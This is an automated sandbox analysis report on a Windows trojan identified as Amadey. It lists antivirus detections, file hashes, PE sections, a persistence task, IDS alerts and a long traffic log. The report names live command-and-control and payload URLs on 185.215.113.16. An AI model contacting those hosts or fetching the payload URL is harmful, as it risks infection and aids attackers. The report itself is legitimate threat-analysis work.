                    Source: Yara match File source: 00000000.00000002.1767879458.0000000000501000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara match File source: 00000001.00000002.1795993129.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                    Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                    Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 1 Scheduled Task/Job | 12 Process Injection | 1 Masquerading | OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                    Credentials | Domains | Default Accounts | 1 Scheduled Task/Job | 1 DLL Side-Loading | 1 Scheduled Task/Job | 251 Virtualization/Sandbox Evasion | LSASS Memory | 741 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                    Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 12 Process Injection | Security Account Manager | 2 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                    Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 2 Obfuscated Files or Information | NTDS | 251 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | 12 Application Layer Protocol | Traffic Duplication | Data Destruction
                    Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 12 Software Packing | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                    Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                    DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 224 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                    [Behavior graph: ID 1519551, Sample: file.exe, Startdate: 26/09/2024, Architecture: WINDOWS, Score: 100]

                    Source | Detection | Scanner | Label | Link
                    file.exe | 53% | ReversingLabs | Win32.Packed.Themida |
                    file.exe | 100% | Avira | TR/Crypt.TPM.Gen |
                    file.exe | 100% | Joe Sandbox ML | |

                    Source | Detection | Scanner | Label | Link
                    C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | 100% | Avira | TR/Crypt.TPM.Gen |
                    C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | 100% | Joe Sandbox ML | |
                    C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | 53% | ReversingLabs | Win32.Packed.Themida |

                    No Antivirus matches
                    No Antivirus matches

                    Source | Detection | Scanner | Label | Link
                    http://185.215.113.16/Jo89Ku7d/index.phpY | 100% | Avira URL Cloud | phishing |
                    http://185.215.113.16/Jo89Ku7d/index.phpJ | 100% | Avira URL Cloud | phishing |
                    http://185.215.113.16/Jo89Ku7d/index.phpy1mb3JtLXVybGVuY29kZWQ= | 100% | Avira URL Cloud | phishing |
                    http://185.215.113.16/Jo89Ku7d/index.phpD | 100% | Avira URL Cloud | phishing |
                    http://185.215.113.16/Jo89Ku7d/index.php | 100% | Avira URL Cloud | malware |
                    http://185.215.113.16/Jo89Ku7d/index.phpI | 100% | Avira URL Cloud | phishing |
                    http://185.215.113.16/Jo89Ku7d/index.phpz | 100% | Avira URL Cloud | phishing |
                    http://185.215.113.16/Jo89Ku7d/index.phpded | 100% | Avira URL Cloud | phishing |
                    http://185.215.113.16/Jo89Ku7d/index.php= | 100% | Avira URL Cloud | phishing |
                    http://185.215.113.16/Jo89Ku7d/index.phpE | 100% | Avira URL Cloud | phishing |
                    http://185.215.113.16/Jo89Ku7d/index.phpX | 100% | Avira URL Cloud | phishing |
                    http://185.215.113.16/Jo89Ku7d/index.phpncoded | 100% | Avira URL Cloud | phishing |
                    http://185.215.113.16/Jo89Ku7d/index.phpncodedV | 100% | Avira URL Cloud | phishing |
                    http://185.215.113.16/Jo89Ku7d/index.phpq | 100% | Avira URL Cloud | phishing |
                    http://185.215.113.16/Jo89Ku7d/index.php/ | 100% | Avira URL Cloud | malware |
                    http://185.215.113.16/Jo89Ku7d/index.phpncodedn | 100% | Avira URL Cloud | phishing |
                    Name | IP | Active | Malicious | Antivirus Detection | Reputation
                    15.164.165.52.in-addr.arpa | unknown | unknown | false | | unknown

                    Name | Malicious | Antivirus Detection | Reputation
                    http://185.215.113.16/Jo89Ku7d/index.php | true | Avira URL Cloud: malware | unknown
                          IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                          185.215.113.16 | unknown | Portugal | | 206894 | WHOLESALECONNECTIONSNL | true
                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1519551
                          Start date and time:2024-09-26 17:04:08 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 5m 55s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:8
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:file.exe
                          Detection:MAL
                          Classification:mal100.troj.spyw.evad.winEXE@5/3@1/1
                          EGA Information:
                          • Successful, ratio: 25%
                          HCA Information:Failed
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                          • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                          • Execution Graph export aborted for target axplong.exe, PID 5064 because there are no executed functions
                          • Execution Graph export aborted for target axplong.exe, PID 6020 because there are no executed functions
                          • Execution Graph export aborted for target file.exe, PID 6692 because it is empty
                          • Not all processes were analyzed, report is missing behavior information
                          • Report size getting too big, too many NtDeviceIoControlFile calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • VT rate limit hit for: file.exe
                          Time | Type | Description
                          11:06:01 | API Interceptor | 478630x Sleep call for process: axplong.exe modified
                          16:05:08 | Task Scheduler | Run new task: axplong path: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          Match | Associated Sample Name / URL | Detection | Threat Name | Context
                          185.215.113.16 | file.exe | malicious | Amadey | 185.215.113.16/Jo89Ku7d/index.php
                          185.215.113.16 | file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.16/Jo89Ku7d/index.php
                          185.215.113.16 | file.exe | malicious | Amadey | 185.215.113.16/Jo89Ku7d/index.php
                          185.215.113.16 | file.exe | malicious | Amadey, Go Injector, XWorm | 185.215.113.16/Jo89Ku7d/index.php
                          185.215.113.16 | file.exe | malicious | Amadey, CryptOne, PureLog Stealer, RedLine, Stealc, Vidar, Zhark RAT | 185.215.113.16/Jo89Ku7d/index.php
                          185.215.113.16 | file.exe | malicious | Amadey | 185.215.113.16/Jo89Ku7d/index.php
                          185.215.113.16 | file.exe | malicious | Amadey | 185.215.113.16/Jo89Ku7d/index.php
                          185.215.113.16 | file.exe | malicious | Amadey | 185.215.113.16/Jo89Ku7d/index.php
                          185.215.113.16 | file.exe | malicious | Amadey, PureLog Stealer, RedLine, Stealc, zgRAT | 185.215.113.16/inc/newbundle2.exe
                          185.215.113.16 | file.exe | malicious | Amadey | 185.215.113.16/Jo89Ku7d/index.php
                          No context
                          Match | Associated Sample Name / URL | Detection | Threat Name | Context
                          WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
                          WHOLESALECONNECTIONSNL | file.exe | malicious | Phorpiex | 185.215.113.66
                          WHOLESALECONNECTIONSNL | file.exe | malicious | Amadey | 185.215.113.16
                          WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
                          WHOLESALECONNECTIONSNL | file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.103
                          WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
                          WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
                          WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
                          WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
                          WHOLESALECONNECTIONSNL | file.exe | malicious | LummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, PureLog Stealer | 185.215.113.117
                          No context
                          No context
                          Process:C:\Users\user\Desktop\file.exe
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):1913344
                          Entropy (8bit):7.950396173130341
                          Encrypted:false
                          SSDEEP:49152:hskp+qQXcNF9BMop9cdXcAB+ZetEWzf23Qfu24G:mkp+qQsNFMhfSWL5G24
                          MD5:EE97C42201B1BF6C1B166B5EF8EE88B0
                          SHA1:EB6894654E6C48E98D4CF16D47073BFE9CCFDDC8
                          SHA-256:9E595C5513BA6EDDE325DC5DADB184A977C6E89EF0A3230212628B100A1ABA4C
                          SHA-512:1A152F6BB5F92A91B2B0CA6BB17066619B8358408EACA2934E32413371F081B3E6F323CDB63AE5030F379A68CEEDCA12BACF9C7BC3A542A404E49A197C7F9510
                          Malicious:true
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          • Antivirus: ReversingLabs, Detection: 53%
                          Reputation:low
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L....@.f..............................K...........@...........................K......;....@.................................W...k...........................t.K.............................$.K..................................................... . ............................@....rsrc...............................@....idata ............................@... ..*.........................@...mtnloani. ....1.....................@...bcuuovzp......K.....................@....taggant.0....K.."..................@...........................................................................................................................................................................................................................
                          Process:C:\Users\user\Desktop\file.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:modified
                          Size (bytes):26
                          Entropy (8bit):3.95006375643621
                          Encrypted:false
                          SSDEEP:3:ggPYV:rPYV
                          MD5:187F488E27DB4AF347237FE461A079AD
                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                          Malicious:true
                          Reputation:high, very likely benign file
                          Preview:[ZoneTransfer]....ZoneId=0
                          Process:C:\Users\user\Desktop\file.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):286
                          Entropy (8bit):3.408377949345087
                          Encrypted:false
                          SSDEEP:6:v4LVXpRKUEZ+lX1lOJUPelkDdtPjgsW2YRZuy0lb2dt0:SpRKQ1lOmeeDHjzvYRQVqt0
                          MD5:9148677647D928CDED564D1926719378
                          SHA1:66445A1280CAE4EBC19AF7113660584F0D92FE40
                          SHA-256:DF53BB8D26AA07CF1207514CA52190AE6D3C47E8F20D33371E7FB3C8A80E9F9B
                          SHA-512:8F69B3337D27910AE1BB0D53C0F8F0F8F2BE5FF1482514849917667EF8E65F825CD1DCBAB2FC7CAF49D4AE41F8531FCE63F5955C0670B2D6F6490FAF7F1F055B
                          Malicious:false
                          Reputation:low
                          Preview:....`2n..!.N.!F.t4E.F.......<... .....s.......... ....................9.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.4.4.1.1.1.d.b.c.4.9.\.a.x.p.l.o.n.g...e.x.e.........J.O.N.E.S.-.P.C.\.j.o.n.e.s...................0...................@3P.........................
                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Entropy (8bit):7.950396173130341
                          TrID:
                          • Win32 Executable (generic) a (10002005/4) 99.96%
                          • Generic Win/DOS Executable (2004/3) 0.02%
                          • DOS Executable Generic (2002/1) 0.02%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                          File name:file.exe
                          File size:1'913'344 bytes
                          MD5:ee97c42201b1bf6c1b166b5ef8ee88b0
                          SHA1:eb6894654e6c48e98d4cf16d47073bfe9ccfddc8
                          SHA256:9e595c5513ba6edde325dc5dadb184a977c6e89ef0a3230212628b100a1aba4c
                          SHA512:1a152f6bb5f92a91b2b0ca6bb17066619b8358408eaca2934e32413371f081b3e6f323cdb63ae5030f379a68ceedca12bacf9c7bc3a542a404e49a197c7f9510
                          SSDEEP:49152:hskp+qQXcNF9BMop9cdXcAB+ZetEWzf23Qfu24G:mkp+qQsNFMhfSWL5G24
                          TLSH:2395332DB4E1EB9FD9DF12F6DA8793C45F98762A44C34D0932461125868F8A0B6F7F80
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>................
                          Icon Hash:90cececece8e8eb0
                          Entrypoint:0x8bb000
                          Entrypoint Section:.taggant
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                          DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                          Time Stamp:0x66A240BE [Thu Jul 25 12:10:38 2024 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:6
                          OS Version Minor:0
                          File Version Major:6
                          File Version Minor:0
                          Subsystem Version Major:6
                          Subsystem Version Minor:0
                          Import Hash:2eabe9054cad5152567f0699947a2c5b
                          Instruction
                          sbb al, 00h
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add dword ptr [eax+00000000h], eax
                          add byte ptr [eax], al
| Name | Virtual Address | Virtual Size | Is in Section |
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x6a057 | 0x6b | .idata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x69000 | 0x1e0 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x4b9474 | 0x10 | mtnloani |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x4b9424 | 0x18 | mtnloani |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |
| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
| | 0x1000 | 0x68000 | 0x2de00 | f7ea1c87b19d4f24283ea635c1a7fc7d | False | 0.9974242166212534 | data | 7.981756657229513 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rsrc | 0x69000 | 0x1e0 | 0x200 | 67c27a9da4fdb15f1de8ffa0df298214 | False | 0.58203125 | data | 4.531214649543818 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .idata | 0x6a000 | 0x1000 | 0x200 | cc76e3822efdc911f469a3e3cc9ce9fe | False | 0.1484375 | data | 1.0428145631430756 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| | 0x6b000 | 0x2ad000 | 0x200 | 9fb5e742a4afb8be134e2e7e76b72840 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| mtnloani | 0x318000 | 0x1a2000 | 0x1a1800 | a31e57591ee0480742fd59bbde0756bd | False | 0.994482129491018 | data | 7.954149945480765 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| bcuuovzp | 0x4ba000 | 0x1000 | 0x400 | 48346f4a6e96239a2780085d5d621115 | False | 0.7392578125 | data | 5.88476992713561 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .taggant | 0x4bb000 | 0x3000 | 0x2200 | 85cdaef9ef82a8f50af846f47133b00d | False | 0.05170036764705882 | DOS executable (COM) | 0.5527501213916006 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
| RT_MANIFEST | 0x4b9484 | 0x17d | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.5931758530183727 |
| DLL | Import |
| kernel32.dll | lstrcpy |
| Language of compilation system | Country where language is spoken | Map |
| English | United States | |
| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
| 2024-09-26T17:06:13.686528+0200 | 2856147 | ETPRO MALWARE Amadey CnC Activity M3 | 1 | 192.168.2.4 | 55659 | 185.215.113.16 | 80 | TCP |
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
                          Sep 26, 2024 17:06:26.196822882 CEST5567180192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:26.196990013 CEST5567180192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:26.201831102 CEST8055671185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:26.911773920 CEST8055671185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:26.911849022 CEST5567180192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:26.912630081 CEST5567180192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:26.917538881 CEST8055671185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:27.158252954 CEST8055671185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:27.158482075 CEST5567180192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:27.268882036 CEST5567180192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:27.269249916 CEST5567280192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:27.274977922 CEST8055672185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:27.274992943 CEST8055671185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:27.275058985 CEST5567180192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:27.275089025 CEST5567280192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:27.275295019 CEST5567280192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:27.280838013 CEST8055672185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:28.001151085 CEST8055672185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:28.001285076 CEST5567280192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:28.002094030 CEST5567280192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:28.007555962 CEST8055672185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:28.234582901 CEST8055672185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:28.234707117 CEST5567280192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:28.346993923 CEST5567280192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:28.347320080 CEST5567380192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:28.555290937 CEST8055673185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:28.555336952 CEST8055672185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:28.555433035 CEST5567380192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:28.555469036 CEST5567280192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:28.555716038 CEST5567380192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:28.560528040 CEST8055673185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:29.270960093 CEST8055673185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:29.271017075 CEST5567380192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:29.273848057 CEST5567380192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:29.278656960 CEST8055673185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:29.507033110 CEST8055673185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:29.507157087 CEST5567380192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:29.613177061 CEST5567380192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:29.613491058 CEST5567480192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:29.618345976 CEST8055674185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:29.618449926 CEST5567480192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:29.618474960 CEST8055673185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:29.618520021 CEST5567380192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:29.618700027 CEST5567480192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:29.623528957 CEST8055674185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:30.327445984 CEST8055674185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:30.327565908 CEST5567480192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:30.328258038 CEST5567480192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:30.333523035 CEST8055674185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:30.577008963 CEST8055674185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:30.577168941 CEST5567480192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:30.862979889 CEST5567480192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:30.863322973 CEST5567580192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:30.868231058 CEST8055675185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:30.868249893 CEST8055674185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:30.868331909 CEST5567480192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:30.868520021 CEST5567580192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:30.868520021 CEST5567580192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:30.873440027 CEST8055675185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:31.605555058 CEST8055675185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:31.605681896 CEST5567580192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:31.606581926 CEST5567580192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:31.611427069 CEST8055675185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:31.838464975 CEST8055675185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:31.838578939 CEST5567580192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:31.940767050 CEST5567580192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:31.940999985 CEST5567680192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:31.945887089 CEST8055676185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:31.945980072 CEST5567680192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:31.946082115 CEST5567680192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:31.946094990 CEST8055675185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:31.946144104 CEST5567580192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:31.950875998 CEST8055676185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:32.642419100 CEST8055676185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:32.642544031 CEST5567680192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:32.643196106 CEST5567680192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:32.648011923 CEST8055676185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:32.872140884 CEST8055676185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:32.872231007 CEST5567680192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:32.998393059 CEST5567680192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:32.998738050 CEST5567780192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:33.004306078 CEST8055676185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:33.004319906 CEST8055677185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:33.004399061 CEST5567680192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:33.004435062 CEST5567780192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:33.004610062 CEST5567780192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:33.009413004 CEST8055677185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:33.706315041 CEST8055677185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:33.706392050 CEST5567780192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:33.707165956 CEST5567780192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:33.711963892 CEST8055677185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:33.934096098 CEST8055677185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:33.934161901 CEST5567780192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:34.050100088 CEST5567780192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:34.050417900 CEST5567880192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:34.055270910 CEST8055678185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:34.055346966 CEST5567880192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:34.055408955 CEST8055677185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:34.055437088 CEST5567880192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:34.055452108 CEST5567780192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:34.060213089 CEST8055678185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:34.762482882 CEST8055678185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:34.762646914 CEST5567880192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:34.763396025 CEST5567880192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:34.768182039 CEST8055678185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:34.994739056 CEST8055678185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:34.994848967 CEST5567880192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:35.097023964 CEST5567880192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:35.097351074 CEST5567980192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:35.102168083 CEST8055678185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:35.102196932 CEST8055679185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:35.102248907 CEST5567880192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:35.102308989 CEST5567980192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:35.102489948 CEST5567980192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:35.107260942 CEST8055679185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:35.797306061 CEST8055679185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:35.797414064 CEST5567980192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:35.804246902 CEST5567980192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:35.809190035 CEST8055679185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:36.027578115 CEST8055679185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:36.027780056 CEST5567980192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:36.144762993 CEST5567980192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:36.145565033 CEST5568080192.168.2.4185.215.113.16
